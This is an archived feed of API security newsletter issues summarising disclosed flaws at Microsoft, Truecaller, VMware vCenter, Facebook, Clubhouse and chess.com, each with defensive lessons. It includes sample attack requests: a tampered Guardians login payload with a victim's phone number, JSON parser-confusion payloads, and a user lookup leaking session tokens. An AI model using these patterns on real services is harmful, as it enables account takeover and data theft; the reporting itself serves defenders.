<p>If you ever used financial applications for your tax returns, financial planning, credit reports, money transfers, and so on, you likely were prompted to give them access to your bank accounts. Doing that by sharing your all-powerful username and password and then letting them scrape the bank web portal is a bad idea. Username and password give full access, beyond your likely much more narrow intent. And scraping easily breaks with any change of the website.</p>
<p><a href="https://openid.net/wg/fapi/" target="_blank" rel="noopener noreferrer">Financial-grade API (FAPI)</a> working group in the OpenID Foundation aims to solve this problem by standardizing APIs that financial institutions use to communicate. The standard describes how OAuth is used to delegate and protect the access, and the JSON schemas for data exchange.</p>
<p>This week, the group reached its major milestone: <a href="https://openid.net/2021/03/12/fapi-1-0-part-1-and-part-2-are-now-final-specifications/" target="_blank" rel="noopener noreferrer">FAPI 1.0 Part 1 and Part 2 are now Final Specifications</a>.</p>
<p>The post <a href="https://apisecurity.io/issue-125/">Issue 125: iPhone call recorder API flaw, Burp and OpenAPI, GraphQL pentesting, FAPI</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 124: API vulnerabilities at Microsoft and Truecaller Guardians, Pentester labs, API security at Ford Motors</title>
		<link>https://apisecurity.io/issue-124-api-vulnerabilities-microsoft-truecaller-guardians-pentester-labs-api-security-ford-motors/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 10 Mar 2021 22:00:07 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=7841</guid>

					<description><![CDATA[<p>This week, we take a look at the recent API vulnerabilities reported at Microsoft and Truecaller Guardians, the new penetration testing labs for API security, and an upcoming webinar on the API security process at Ford Motors. Vulnerability: Microsoft online accounts API endpoints for resetting account passwords are a frequent attack vector. Attackers brute-force these [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-124-api-vulnerabilities-microsoft-truecaller-guardians-pentester-labs-api-security-ford-motors/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-124-api-vulnerabilities-microsoft-truecaller-guardians-pentester-labs-api-security-ford-motors/">Issue 124: API vulnerabilities at Microsoft and Truecaller Guardians, Pentester labs, API security at Ford Motors</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we take a look at the recent API vulnerabilities reported at Microsoft and Truecaller Guardians, the new penetration testing labs for API security, and an upcoming webinar on the API security process at Ford Motors.</p>
<h2>Vulnerability: Microsoft online accounts</h2>
<p>API endpoints for resetting account passwords are a frequent attack vector. Attackers brute-force these by supplying as many possible combinations of password reset codes as they can within the time window available to them.</p>
<p>Laxman Muthiyah found <a href="https://thezerohack.com/how-i-might-have-hacked-any-microsoft-account" target="_blank" rel="noopener noreferrer">a way to break into the password reset API for all Microsoft&#8217;s online accounts</a>. He requested a password reset code — a 7-digit one in Microsoft&#8217;s case — for the target account and then tried to brute-force his way in by calling the verification API with all possible combinations from multiple locations.</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-7844 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/03/Microsoft_password-reset-API.jpg" alt="" width="1200" height="517" /></p>
<p>Microsoft had actually already taken measures to make it harder to break into the system:</p>
<ul>
<li>The API did not accept the code just as plain numbers but had some basic encryption between the client and the API that the attacker had to figure out. This also made it impossible to use off-the-shelf iteration tools like Burp plugins.</li>
<li>The API had rate-limiting in place.</li>
<li>The API detected attacks with parallel requests from multiple endpoints quite quickly, blacklisted the IP addresses, and rejected all codes from them, including the correct one.</li>
</ul>
<p>Despite this, Muthiyah managed to demonstrate that he could still get in if he deployed the automated attack simultaneously from thousands of clients. Even if an account was protected with two-factor authentication (2FA), the same operation just had to be repeated for the 6-digit 2FA code.</p>
<p>For his efforts and report, Muthiyah received the award of $50,000. Microsoft has fixed the issue.</p>
<p>We have previously covered <a href="https://apisecurity.io/issue-40-instagram-7-eleven-zipato/" target="_blank" rel="noopener noreferrer">a similar vulnerability that Muthiyah reported for Instagram</a>.</p>
<p>Lessons learned here:</p>
<ul>
<li>Password reset endpoints are frequently a source of <a href="https://apisecurity.io/encyclopedia/content/owasp/api2-broken-authentication" target="_blank" rel="noopener noreferrer">OWASP API:2 Broken Authentication vulnerability</a>.</li>
<li>Assume that attackers can launch distributed attacks from multiple IP addresses.</li>
<li>MFA helps but can be vulnerable to similar attacks.</li>
<li>The more complex reset codes you use, the harder it will be to brute-force them. An alphanumeric code of the same length has a lot more combinations.</li>
<li>Smart rate-limiting mechanisms serve as additional protection.</li>
</ul>
<h2>Vulnerability: Truecaller Guardians</h2>
<p>Truecaller has recently launched its Guardians app that allows permanently sharing your real-time location with trusted contacts, like your family. <a href="https://www.pingsafe.ai/blog/hacking-truecallers-guardian-application-to-track-you" target="_blank" rel="noopener noreferrer">Anand Prakash found a way to take over any account in the system</a> and access sensitive information of users and their family members.</p>
<p>The vulnerability lay in the API that allowed users to log into the app using their Truecaller account. All attackers had to do was to first log into their own Truecaller account and then, when going to the Guardians app, substitute their phone number in the payload with that of their intended victim. The app then used that phone number as the ID to match the user with the profile.</p>
<pre class="line-numbers"><code class="language-http">POST /v0/user HTTP/1.1
Host: api. getguardians. com
Content-Type: application/json
Accept: */*
Connection: close
Content-Length: 656
User-Agent: Guardians/1.1.3 (com.truesoftware.Guardians; build:1.1.3; iOS 14.4.0) Alamofire/5.4.1
Accept-Language: en-IN;q=1.0, kn-IN;q=0.9, hi-IN;q=0.8, hi-Latn-IN;q=0.7
Authorization: Bearer aQ4AOdxwPPWJM06sICQMQRWlANOC1crV
Accept-Encoding: gzip, deflate
{
 "userVerificationInput": {
   "nonTCUserToken": "",
   "tcUserSignature": "[Attacker's Signature]",
   "tcUserPayload": "[Attacker's Payload]"
 },
 "phoneNumber": {
   "countryCode": "IN",
   "number": "[<strong>Victim's Phone Number</strong>]"
 },
 "tcUser": true,
 "ios": true
}</code></pre>
<ul>
<li>There was no protection against payload tampering (this wasn&#8217;t a signed token)</li>
<li>The Guardians app did not validate in any way that the phone number in the incoming request belonged to the user authenticated in Truecaller. It would just give full access to the account to anyone presenting a known phone number.</li>
</ul>
<p>This is another example of <a href="https://apisecurity.io/encyclopedia/content/owasp/api2-broken-authentication" target="_blank" rel="noopener noreferrer">OWASP API:2 Broken Authentication vulnerability</a>. Be careful with your authentication workflow design, especially when you are looking at a federated scenario and users logging into one system then get access into another.</p>
<h2>Training: API security pentesting labs</h2>
<p>Penetration testing is best learned by practice. <a href="https://pentesterlab.com/badges/api" target="_blank" rel="noopener noreferrer">PentesterLab has created a special category</a> and started adding API security labs to their site. One hands-on API security lab is already available, with 3 more in the works.</p>
<p>Perfect opportunity to get some hands-on experience.</p>
<h2>API security in the enterprise: Ford Motors</h2>
<p>Rolling out a successful API security program in a large enterprise can be a challenge.</p>
<p><a href="https://us02web.zoom.us/webinar/register/WN_KJ_v_MCGQE6XoKTo5q_rxg" target="_blank" rel="noopener noreferrer">Next Thursday, March 18th at 8 AM (PST)</a>,  <strong>Darren Shelcusky, Manager of Vehicle &amp; Connectivity Cybersecurity at Ford Motor Company,</strong> tells how their process was.</p>
<p>In the webinar, Darren will explain Ford&#8217;s approach to API security and their journey to enforce security compliance while ensuring productivity of hundreds of developers managing thousands of APIs.</p>
<p>Registration is open <a href="https://us02web.zoom.us/webinar/register/WN_KJ_v_MCGQE6XoKTo5q_rxg" target="_blank" rel="noopener noreferrer">here</a>.</p>
<p><a href="https://us02web.zoom.us/webinar/register/WN_KJ_v_MCGQE6XoKTo5q_rxg" target="_blank" rel="noopener noreferrer"><img loading="lazy" decoding="async" class="size-full wp-image-7842 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/03/Ford_API_Security_webinar.jpg" alt="" width="1200" height="611" /></a></p>
<p>The post <a href="https://apisecurity.io/issue-124-api-vulnerabilities-microsoft-truecaller-guardians-pentester-labs-api-security-ford-motors/">Issue 124: API vulnerabilities at Microsoft and Truecaller Guardians, Pentester labs, API security at Ford Motors</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 123: API vulnerabilities VMWare vCenter and Facebook, mismatch between JSON parsers, API security fixes in VS Code</title>
		<link>https://apisecurity.io/issue-123-vmware-vcenter-rce-facebook-cache-server-issues-json-parsers-api-security-fixes-vs-code/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 03 Mar 2021 22:00:17 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=7820</guid>

					<description><![CDATA[<p>This week, we learn about the recent serious API vulnerability in VMware vCenter (if you have one, update ASAP!), why query and path parameters cannot be trusted for confidential data, how potential attacks can emerge from inconsistencies in JSON parser behavior, and how a VS Code extension can help fix API vulnerabilities. Vulnerability: VMware vCenter [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-123-vmware-vcenter-rce-facebook-cache-server-issues-json-parsers-api-security-fixes-vs-code/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-123-vmware-vcenter-rce-facebook-cache-server-issues-json-parsers-api-security-fixes-vs-code/">Issue 123: API vulnerabilities VMWare vCenter and Facebook, mismatch between JSON parsers, API security fixes in VS Code</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we learn about the recent serious API vulnerability in VMware vCenter (if you have one, update ASAP!), why query and path parameters cannot be trusted for confidential data, how potential attacks can emerge from inconsistencies in JSON parser behavior, and how a VS Code extension can help fix API vulnerabilities.</p>
<h2>Vulnerability: VMware vCenter</h2>
<p>VMware vCenter and its sub-component vSphere let businesses virtualize and control their corporate infrastructure, thus is often located on internal networks. Any vulnerability there is thus a serious concern.</p>
<p>Mikhail Klyuchnikov from PT SWARM found <a href="https://swarm.ptsecurity.com/unauth-rce-vmware/" target="_blank" rel="noopener noreferrer">a critical remote code execution (RCE) vulnerability in VMware vCenter</a> (CVE-2021-21972).  In a nutshell:</p>
<ol>
<li>One of the plugins enabled by default in vCenter allowed unauthorized users to access any URL it handled.</li>
<li>One of its paths included a <code>POST</code> operation to upload a <code>.tar</code> file</li>
<li>The implementation of the operation unpacked the <code>.tar</code> archive, iterated over the files in the archive, and created the files on the server by simply concatenating the folder path with the filename.</li>
<li>Creating filenames with <code>../</code> allowed Klyuchnikov to escape the plugin folder and upload arbitrary files to arbitrary folders on the server.</li>
<li>Klyuchnikov then just had to figure out the places where he could put his scripts to have them later executed by vCenter.</li>
</ol>
<p><img loading="lazy" decoding="async" class="size-full wp-image-7821 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/03/vCenter_API_vulnerability.png" alt="" width="1007" height="790" /></p>
<p>It&#8217;s worth noting that Linux was as vulnerable here as Windows pictured above.</p>
<p>Lessons learned with this one:</p>
<ul>
<li>Endpoints not covered by authentication are <em>extremely dangerous</em> and need to be avoided.</li>
<li>Plugins expand your attack surface, especially if they expose APIs.</li>
<li>You cannot trust any API caller, so strictly define all inputs and validate the data that you get.</li>
</ul>
<h2>Vulnerability: Facebook&#8217;s cache server</h2>
<p>URLs of API calls (and thus path and query parameters in them) should not be used to pass any confidential data. They are visible to proxy servers, web browsers, browser extensions, and so on. They may also be stored in logs that these write. Thus, the confidential data might get stored who knows where outside your control.</p>
<p><a href="https://ysamm.com/?p=629" target="_blank" rel="noopener noreferrer">Youssef Sammouda found a way to exploit that vulnerability at Facebook</a> by exploiting their cache server. The cache endpoint allowed to check whether a specific URL was present in the cache. Sammouda could then just enumerate URLs by appending characters one by one to find the ones that existed.</p>
<p>Some of the data that could be thus exposed included, for example:</p>
<ul>
<li>Internal endpoints at Facebook</li>
<li>Internal files</li>
<li>JavaScript files</li>
<li>Endpoints leaking access tokens and passwords in <code>GET</code> requests</li>
<li>Other information about users or employees in URLs</li>
</ul>
<p>The vulnerability has luckily since been fixed.</p>
<p>Do pay special attention to what kind of information gets included in query and path parameters. You never know where those could pop up, allowing attackers to find out much more details on your system that you might be comfortable with.</p>
<h2>Attack vectors: JSON parsers</h2>
<p>Modern REST APIs typically accept and exchange JSON payloads. Can this universal language that your product components are using to communicate with each other become an attack vector of its own? <a href="https://labs.bishopfox.com/tech-blog/an-exploration-of-json-interoperability-vulnerabilities" target="_blank" rel="noopener noreferrer">Jake Miller has found out that indeed it can</a>.</p>
<p>The vulnerability lies in the ambiguity of the JSON standard itself and how it leaves some definitions open-ended or ambiguous. When a standard does not impose a strict implementation, it leaves room for interpretation and variation. In the context of a single JSON parser, these could be shrugged off as hardly significant quirks, but the picture changes when you have more than one JSON parser at play.</p>
<p>This is not at all an unlikely scenario in microservices-based systems. When your microservices are implemented in different stacks, they may end up using different JSON parsers. This in turn can lead to discrepancies in input and output values from different parts of the architecture, with unforeseen consequences. Attackers can exploit this by constructing a JSON payload that lets them benefit from these inconsistencies.</p>
<p>Miller&#8217;s post is thorough, illustrative, and completely fascinating, so do go and check it out. As a teaser, here are the main categories of identified discrepancies:</p>
<ul>
<li>Inconsistent duplicate key precedence:
<pre class=" language-javascript"><code class=" language-javascript">obj <span class="token operator">=</span> <span class="token punctuation">{</span><span class="token string">"test"</span><span class="token operator">:</span> <span class="token number">1</span><span class="token punctuation">,</span> <span class="token string">"test"</span><span class="token operator">:</span> <span class="token number">2</span><span class="token punctuation">}</span></code></pre>
<p>Imagine an online shop in which the shipping service API might read one quantity from a request payload, and the billing service another, much lower one.</li>
<li>Key collision in character truncation and comments:<br />
problems in character interpretation:</p>
<pre class=" language-javascript"><code class=" language-javascript"><span class="token punctuation">{</span><span class="token string">"test"</span><span class="token operator">:</span> <span class="token number">1</span><span class="token punctuation">,</span> <span class="token string">"test\[raw \x0d byte]"</span><span class="token operator">:</span> <span class="token number">2</span><span class="token punctuation">}</span> <span class="token punctuation">
{</span><span class="token string">"test"</span><span class="token operator">:</span> <span class="token number">1</span><span class="token punctuation">,</span> <span class="token string">"test\ud800"</span><span class="token operator">:</span> <span class="token number">2</span><span class="token punctuation">}</span><span class="token punctuation">
{</span><span class="token string">"test"</span><span class="token operator">:</span> <span class="token number">1</span><span class="token punctuation">,</span> <span class="token string">"test"</span><span class="token string">": 2}
{"</span>test<span class="token string">": 1, "</span>te\st"<span class="token operator">:</span> <span class="token number">2</span><span class="token punctuation">}
</span></code></pre>
<p>problems with comments:</p>
<pre class=" language-javascript"><code class=" language-javascript">obj <span class="token operator">=</span> <span class="token punctuation">{</span><span class="token string">"description"</span><span class="token operator">:</span> <span class="token string">"Duplicate with comments"</span><span class="token punctuation">,</span> <span class="token string">"test"</span><span class="token operator">:</span> <span class="token number">2</span><span class="token punctuation">,</span> <span class="token string">"extra"</span><span class="token operator">:</span> <span class="token comment">/*, "test": 1, "extra2": */</span><span class="token punctuation">}</span></code></pre>
<p>Imagine an API call getting an admin role because the request had a role name that one service interpreted as a permissible custom role name (because it had some extra characters in the role name), while other services as a built-in <code>admin</code> role.</li>
<li>JSON Serialization Quirks: For example, duplicate keys getting removed (or not) or reordered when an object is deserialized and serialized back. This can have exploit scenarios similar to the key precedence one mentioned earlier.</li>
<li>Float and integer representation: Different JSON parsers may interpret a large number like <code>999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999</code> completely differently, like:
<pre class=" language-javascript"><code class=" language-javascript"><span class="token number">999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999</span>
<span class="token number">9.999999999999999e95</span>
<span class="token number">1E+96</span>
<span class="token number">0</span>
<span class="token number">9223372036854775807</span></code></pre>
<p>Or they might use different values as infinity representation.</li>
<li>Permissive parsing and other bugs: For example, how different JSON parsers handle trailing garbage or malformed JSON.</li>
</ul>
<p>See the full article for more details on the included JSON parsers.</p>
<p>It goes without saying that it is of utmost importance to ensure that the parsers you use have consistent behavior, or externalize your data validation. Or better yet, both.</p>
<h2>Tools: Security fixes in the VS Code OpenAPI extension</h2>
<p><a href="https://marketplace.visualstudio.com/items?itemName=42Crunch.vscode-openapi" target="_blank" rel="noopener noreferrer">VS Code OpenAPI (Swagger) Editor extension</a> is a popular extension by 42Crunch, with more than 140 thousand active installs and many 5-star reviews.</p>
<p>Besides offering editing, navigating, and previewing your OpenAPI files in the IDE, it includes API Contract Security Audit as a built-in feature. This produces an audit report that helps developers identify potential security issues in the API contract they are working on already during the design time.</p>
<p>The latest version of the plugin takes this a step further and makes fixing the identified security issues quicker, with just a few easy clicks:</p>
<p><img loading="lazy" decoding="async" class="alignleft size-full wp-image-7822" src="https://apisecurity.io/wp-content/uploads/2021/03/VSCode_OpenAPI_bulk_security_fixes.gif" alt="" width="960" height="720" /></p>
<p>The post <a href="https://apisecurity.io/issue-123-vmware-vcenter-rce-facebook-cache-server-issues-json-parsers-api-security-fixes-vs-code/">Issue 123: API vulnerabilities VMWare vCenter and Facebook, mismatch between JSON parsers, API security fixes in VS Code</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 122: API issues at Clubhouse and healthcare apps, scope-based recon, OAS v3.1.0</title>
		<link>https://apisecurity.io/issue-122-api-issues-clubhouse-healthcare-apps-scope-based-recon-oas-v3-1-0/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 24 Feb 2021 22:00:18 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=7792</guid>

					<description><![CDATA[<p>This week, we take a look at the recent data spill incident at Clubhouse, the (poor) state of API security in major healthcare mobile applications, how scope-based reconnaissance methodology works, and the latest update (v3.1.0) to the OpenAPI Specification. Vulnerability: Clubhouse Clubhouse is an audio-only social network app for iPhone. Last Sunday, it had a [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-122-api-issues-clubhouse-healthcare-apps-scope-based-recon-oas-v3-1-0/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-122-api-issues-clubhouse-healthcare-apps-scope-based-recon-oas-v3-1-0/">Issue 122: API issues at Clubhouse and healthcare apps, scope-based recon, OAS v3.1.0</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we take a look at the recent data spill incident at Clubhouse, the (poor) state of API security in major healthcare mobile applications, how scope-based reconnaissance methodology works, and the latest update (v3.1.0) to the OpenAPI Specification.</p>
<h2>Vulnerability: Clubhouse</h2>
<p>Clubhouse is an audio-only social network app for iPhone. Last Sunday, it had a data spill incident in which one of the users started streaming multiple rooms from their own website. This breaks Clubhouse&#8217;s terms of service and customer expectations: conversations are only supposed to be accessible live and only to the users in that particular room.</p>
<p>Daniel Sinclair posted his analysis on the root cause of the incident in <a href="https://twitter.com/_DanielSinclair/status/1363738761339826177" target="_blank" rel="noopener noreferrer">his Twitter thread</a>. It turns out that APIs and tokens are at the heart of it.</p>
<p>Clubhouse itself is actually mostly handling just the user management part. A different platform, Agora, does the audio streaming. When users join a room, they are issued an Agora token. The Clubhouse app then uses these tokens to grant users access to the audio stream.</p>
<p>Attackers used their Clubhouse user token and had a bot join every room, collect the Agora tokens, and plug them into a browser client. This worked because Agora tokens are long-lived and independent of Clubhouse. Once you get an Agora token, you retain access to the room&#8217;s audio stream even if you leave the room in Clubhouse (so the state of your Clubhouse user token changes, but Agora token doesn&#8217;t) and join another one.</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-7794 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/02/Tokens-and-APIs-in-Clubhouse-and-Agora.jpg" alt="" width="800" height="725" /></p>
<p>Lessons learned here:</p>
<ul>
<li>If your service or application is popular, attackers <em>will</em> do their best to figure out the APIs behind your app and use them to work around any limitations you have imposed on the user interface.</li>
<li>Beware of scripted enumeration, such as room enumeration to obtain Agora tokens in this case.</li>
<li>Pay attention to token lifecycle and the connection between the service provider (here Agora) and the identity provider (Clubhouse). Long-lived tokens that cannot be recalled can bite you.</li>
</ul>
<h2>Research: API security in healthcare mobile apps</h2>
<p>Approov has published security research by Alissa Knight on 30 popular medical healthcare apps. It is estimated that together these apps have 23 million users.</p>
<p>The findings of the research are pretty dismal:</p>
<ul>
<li>100% of the checked apps were vulnerable to <a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization" target="_blank" rel="noopener noreferrer">Broken Object-Level Authorization (BOLA/IDOR)</a> and exposing personal (PII) and health (PHI) information!</li>
<li>50% of the APIs tested gave access to other patients&#8217; pathology, X-rays, and clinical results.</li>
<li>77% of applications had hard-coded API keys, tokens, or credentials.</li>
</ul>
<p><img loading="lazy" decoding="async" class=" wp-image-7817 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/02/mHealth-infographics.jpg" alt="" width="441" height="464" /></p>
<p>Below are some of the recommendations from the research:</p>
<ul>
<li>Address both app security and API security: recognize that synthetic traffic to the API is an issue and arises from bots and automated tools, not from genuine apps and legitimate data requests.</li>
<li>Shift left and shield right: secure the development process and harden apps, but ensure that runtime protection is also in place.</li>
<li>Protect against X-in-the-middle attacks: certificate pinning is critical but often left undone because expired certificates can block apps and impact the user experience. However, when done correctly, certificate pinning does not impact either performance or availability.</li>
<li>Improve visibility into controls: organizations and developers need to monitor the effectiveness of the controls they implement and adjust them easily – both for compliance with HIPAA mandates and to sustain data security and privacy.</li>
<li>Penetration testing, as well as static and dynamic code analysis, should be performed regularly.</li>
</ul>
<p>See <a href="https://www.businesswire.com/news/home/20210209005461/en/" target="_blank" rel="noopener noreferrer">the press release</a> for the report summary. The full report is available <a href="https://approov.io/mhealth/hacking/" target="_blank" rel="noopener noreferrer">here</a>.</p>
<h2>Methodology: Reconnaissance guidelines</h2>
<p>Reconnaissance (aka recon) is the process of discovering the attack surface of a system under penetration testing. With modern complex systems, the attack surface can be significant, and thus the discovery could include several different approaches and tools.</p>
<p>Harsh Bothra has done a nice job summarizing the various approaches in his <a href="https://blog.cobalt.io/scope-based-recon-smart-recon-tactics-7e72d590eae5" target="_blank" rel="noopener noreferrer">Scope Based Recon Methodology</a>:</p>
<ul>
<li>The small scope would only include a single URL, or a small set of URLs, in a system (for example, staging, development, and testing environments).</li>
<li>The medium scope would include wildcards and subdomains.</li>
<li>The large scope would include all the resources that the organization has.</li>
</ul>
<p>Here&#8217;s the handy mindmap that he came up with:</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-7795 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/02/Scope-based-recon-mindmap.png" alt="" width="2451" height="3589" /></p>
<p>For each area in his map, Bothra provides a quick description and links to the popular tools used for the procedure. Definitely worth checking out.</p>
<h2>Standards: The OpenAPI Specification v3.1.0</h2>
<p>The OpenAPI Specification (OAS) is the prevailing industry standard for HTTP (including REST) API contracts and documenting them.</p>
<p>The standard is maintained by the OpenAPI Initiative (OAI), an industry consortium under Linux Foundation that includes vendors such as 42Crunch, Google, IBM, Kong, Microsoft, MuleSoft, Oracle, Postman, SAP, SmartBear, and others.</p>
<p>This week, the OAI has officially released version 3.1.0 of the OAS. The major changes in the new version include:</p>
<ul>
<li>Full compatibility with the JSON Schema standard</li>
<li>Support for webhooks</li>
<li>Support for identifying API licenses using the standard SPDX identifier</li>
<li><code>pathItems</code> object is now optional, making it simpler to create reusable libraries of components.</li>
<li>Mutual certificate for API authentication is now supported.</li>
</ul>
<p>Note that v3.1.0 is incompatible with v3.0.x — there are breaking changes in the standard. Thus, it will take some time for the tooling to catch up with the new version.</p>
<p>For more details, see:</p>
<ul>
<li>The <a href="https://www.openapis.org/blog/2021/02/18/openapi-specification-3-1-released" target="_blank" rel="noopener noreferrer">official announcement</a> by the OAI</li>
<li>A post by Phil Sturgeon on the <a href="https://www.openapis.org/blog/2021/02/16/migrating-from-openapi-3-0-to-3-1-0" target="_blank" rel="noopener noreferrer">major breaking changes and migrating from 3.0.x to 3.1.0</a></li>
</ul>
<p>&nbsp;</p>
<p>The post <a href="https://apisecurity.io/issue-122-api-issues-clubhouse-healthcare-apps-scope-based-recon-oas-v3-1-0/">Issue 122: API issues at Clubhouse and healthcare apps, scope-based recon, OAS v3.1.0</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 121: Vulnerability at chess.com, GraphQL security playground and checklist</title>
		<link>https://apisecurity.io/issue-121-vulnerability-chess-com-graphql-security-playground-checklist/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 17 Feb 2021 22:00:33 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=7771</guid>

					<description><![CDATA[<p>This week, we take a look at the recent API vulnerability at chess.com, resources for GraphQL API security, and some API security advice from Michael Cobb at TechTarget. Vulnerability: chess.com Sam Curry found an API vulnerability that allowed arbitrary account takeover in chess.com, a popular online chess community and app. Community members can exchange messages, [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-121-vulnerability-chess-com-graphql-security-playground-checklist/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-121-vulnerability-chess-com-graphql-security-playground-checklist/">Issue 121: Vulnerability at chess.com, GraphQL security playground and checklist</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we take a look at the recent API vulnerability at <z>chess</z>.<z>com</z>, resources for GraphQL API security, and some API security advice from Michael Cobb at TechTarget.</p>
<h2>Vulnerability: chess.com</h2>
<p>Sam Curry found an <a href="https://samcurry.net/hacking-chesscom/" target="_blank" rel="noopener noreferrer">API vulnerability that allowed arbitrary account takeover in chess.com</a>, a popular online chess community and app.</p>
<p>Community members can exchange messages, both online and in the app. Hence, there is an API powering that feature and locating user records. Unfortunately, this API was exposing way too much information than was required for sending a message to a user.</p>
<p>So a call like the following, looking for a user with the username <code>hikaru</code>:</p>
<pre class="line-numbers"><code class="language-http">GET /v1/users?loginToken=98a161...&amp;username=hikaru&amp;signed=iOS3.9.7-7b9f138... 
HTTP/1.1
Host: api. chess. com</code></pre>
<p>Returned this kind of response:</p>
<pre class="line-numbers"><code class="language-json">{
  "status": "success",
  "data": {
    "email": "<strong>REDACTED</strong>",
    "premium_status": 3,
    "id": 15448422,
    "uuid": "<strong>REDACTED</strong>",
    "country_id": 2,
    "avatar_url": "<strong>REDACTED</strong>",
    "last_login_date": <strong>REDACTED</strong>,
    "session_id": "<strong>REDACTED</strong>",
    "location": "Sunrise, Florida",
    "username": "Hikaru",
    "points": 52,
    "chess_title": "GM",
    "first_name": "Hikaru Nakamura",
    "last_name": null,
    "country_name": "United States",
    "member_since": <strong>REDACTED</strong>,
    "about": "",
    "is_blocked": false,
    "is_tracked": false,
    "are_friends": false,
    "friend_request_exists": true,
    "is_able_to_change_username": null,
    "flair_code": "diamond_traditional",
    "show_ads": true,
    "is_fair_play_agreed": true
  }
}</code></pre>
<p>The response included some personal information about the user, like the email address. Even worse, the <code>session_id</code> field in the response turned out to be the security token that authenticates the user! So after a simple call to find a user, an attacker would be able to log in as that user and take over the account.</p>
<p>But that was not the end of it. Even worse, Curry discovered that for an admin user, he could use that token to log in to <z>admin</z>.<z>chess</z>.<z>com</z>, the administrative console for the entire community, and take over everything with the admin account.</p>
<p>This is a classic case of the <a href="https://apisecurity.io/encyclopedia/content/owasp/api3-excessive-data-exposure" target="_blank" rel="noopener noreferrer">OWASP API3:2019 — Excessive data exposure</a> vulnerability. To prevent it:</p>
<ul>
<li>Properly define the response schemas of each API operation.</li>
<li>Review the response schemas to keep the exposed data to the bare minimum necessary for the application. Avoid exposing any sensitive information should the data get into attackers&#8217; hands.</li>
<li>Finally, enforce these responses with proper validation of any outgoing data.</li>
</ul>
<h2>Resources: Damn Vulnerable GraphQL Application</h2>
<p><a href="https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application" target="_blank" rel="noopener noreferrer">Damn Vulnerable GraphQL Application (DVGA)</a> by Dolev Farhi and Connor McKinnon is a purpose-built, highly insecure GraphQL application. You can use it as a playground to see some of the most frequent GraphQL vulnerabilities in action.</p>
<p>The application currently covers the following GraphQL vulnerability scenarios:</p>
<ul>
<li><strong>Denial of Service</strong>
<ul>
<li>Batch Query Attack</li>
<li>Deep Recursion Query Attack</li>
<li>Resource Intensive Query Attack</li>
</ul>
</li>
<li><strong>Information Disclosure</strong>
<ul>
<li>GraphQL Introspection</li>
<li>GraphQL Interface</li>
<li>GraphQL Field Suggestions</li>
<li>Server-Side Request Forgery</li>
</ul>
</li>
<li><strong>Code Execution</strong>
<ul>
<li>OS Command Injection #1</li>
<li>OS Command Injection #2</li>
</ul>
</li>
<li><strong>Injection</strong>
<ul>
<li>Stored Cross-Site Scripting</li>
<li>Log spoofing / Log Injection</li>
<li>HTML Injection</li>
</ul>
</li>
<li><strong>Authorization Bypass</strong>
<ul>
<li>GraphQL Interface Protection Bypass</li>
<li>GraphQL Query Deny List Bypass</li>
</ul>
</li>
<li><strong>Miscellaneous</strong>
<ul>
<li>GraphQL Query Weak Password Protection</li>
<li>Arbitrary File Write / Path Traversal</li>
</ul>
</li>
</ul>
<h2>Resources: GraphQL Security Cheat Sheet</h2>
<p>If you are on the defending side in GraphQL and want to protect your GraphQL APIs, check out this <a href="https://cheatsheetseries.owasp.org/cheatsheets/GraphQL_Cheat_Sheet.html" target="_blank" rel="noopener noreferrer">GraphQL Security Cheat Sheet from OWASP</a>.</p>
<p>This page provides guidance on how to implement the following in GraphQL:</p>
<ul>
<li>Input validation</li>
<li>DoS protection</li>
<li>Access control</li>
<li>Security configuration</li>
</ul>
